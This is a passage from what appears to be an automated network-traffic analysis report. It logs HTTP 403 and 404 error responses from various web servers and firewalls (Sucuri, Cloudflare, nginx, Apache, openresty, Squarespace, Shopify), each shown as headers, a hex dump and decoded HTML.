5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 68 69 63 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 64 69 76 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 66 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 1f9<html><head><title>403 Forbidden</title><script type="text/javascript">(function(){ if (typeof(___zen) === "undefined") {setTimeout(arguments.callee, 50); return; }___zen.hic("__ZEHIC2381", 1685537476, 1, 0, 60); })()</script><script type="text/javascript" async="async" src="/__zenedge/assets/hic.js?v=1674207422"></script></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center><script type="text/javascript" async="async" src="/__zenedge/assets/f.js?v=1674207422"></script></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Wed, 31 May 2023 12:55:51 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 15012X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: FBP006Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 34 63 66 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 61 63 63 65 73 73 2d 64 65 6e 69 65 64 20 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 20 63 65 6e 74 65 72 20 77 69 64 74 68 2d 6d 61 78 2d 39 34 30 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 62 72 61 6e 64 2d 6
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:51:30 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveServer: nginxVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:51:30 GMTServer: Apache/2.4Content-Length: 318Keep-Alive: timeout=5, max=300Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:51:30 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=N3z523bMU0OfuLfnDvifWCM1WI7WXAWG9H56qwr83TSlbqp%2BnS8vssyik%2BjgSCIzQ415KeEe3%2BbSnXWolkXCvuRhkR1Gxb6tCrdlxTKm0pxs9dfEJEuXKBawRucIHjM2"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7cff5945084a9130-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 31 May 2023 12:51:30 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 216X-Sorting-Hat-ShopId: 66042101977Server-Timing: processing;dur=21X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west4,gcp-us-east1,gcp-us-east1X-Request-ID: a2c1e028-5fde-4d4f-a1d8-b16cb3f60cc6CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fmvtbBzGLwqzfMppdAS%2FbxddFlqLgz8dLiQu6wXjWTTU%2B4HgmpcJkHsAZU%2FCLLIRmEmR9SDXtH87tL2pmotwVObe67UpkCcNWBGDHl%2Bh1qJNdAXUhhM%2FB2zTR6AIKNc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=148.000002Server: cloudflareCF-RAY: 7cff5944f99a902e-FRAalt-svc: h3=":443"; ma=86400
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openresty/1.15.8.2Date: Wed, 31 May 2023 12:51:30 GMTContent-Type: text/htmlContent-Length: 561Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 35 2e 38 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty/1.15.8.2</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:51:30 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vhhzPB7HQZgZIHWJJJVat1NopBfQm2%2B1mBEOBQM2U4Bo2gK%2FD%2Fpy9Trk5OscaIu8mm4%2F1r4pzbY30zfYaVzKUZT7%2F5%2FnY3r9g3ARugL5pZBqzDKTvSzhtARDKCUlXAfa"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7cff59466b059130-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenCache-Control: no-cache, must-revalidateContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Wed, 31 May 2023 12:51:31 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceX-Contextid: SsMe8RWh/HysteZ1gData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 3
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:51:32 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveAccept-Ranges: bytesContent-Length: 904Keep-Alive: timeout=5, max=100Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 3e 20 20 20 0a 09 09 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 0a 09 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 09 09 64 69 76 2c 20 69 6d 67 7b 20 62 65 68 61 76 69 6f 72 3a 75 72 6c 28 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 73 63 72 69 70 74 73 2f 69 65 70 6e 67 66 69 78 2e 68 74 63 29 20 7d 0a 09 09 09 3c 2f 73 74 79 6c 65 3e 0a 09 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 62 6f 78 22 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 6f 62 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 72 61 64 22 3e 26 6e 62 73 70 3b 3c 2f 73 70 61 6e 3e 20 20 0a 09 09 09 09 09 3c 68 31 3e 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 2f 68 31 3e 20 20 20 20 20 20 20 20 20 20 20 0a 09 09 09 09 09 3c 70 3e 46 65 68 6c 65 72 20 34 30 33 20 2d 20 5a 75 67 72 69 66 66 20 6e 69 63 68 74 20 67 65 73 74 61 74 74 65 74 3c 62 72 20 2f 3e 0a 09 09 09 09 09 53 69 65 20 76 65 72 66 c3 bc 67 65 6e 20 6e 69 63 68 74 20 c3 bc 62 65 72 20 64 69 65 20 6e 6f 74 77 65 6e 64 69 67 65 6e 20 52 65 63 68 74 65 2c 20 64 69 65 20 61 6e 67 65 66 6f 72 64 65 72 74 65 20 53 65 69 74 65 20 7a 75 20 62 65 74 72 65 74 65 6e 2e 3c 62 72 20 2f 3e 0a 09 09 09 09 09 42 69 74 74 65 20 77 65 6e 64 65 6e 20 53 69 65 20 73 69 63 68 20 61 6e 20 64 65 6e 20 57 65 62 6d 61 73 74 65 72 2e 3c 2f 70 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 75 6e 74 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"><htm
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 31 May 2023 12:51:32 GMTContent-Type: text/htmlContent-Length: 552Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome 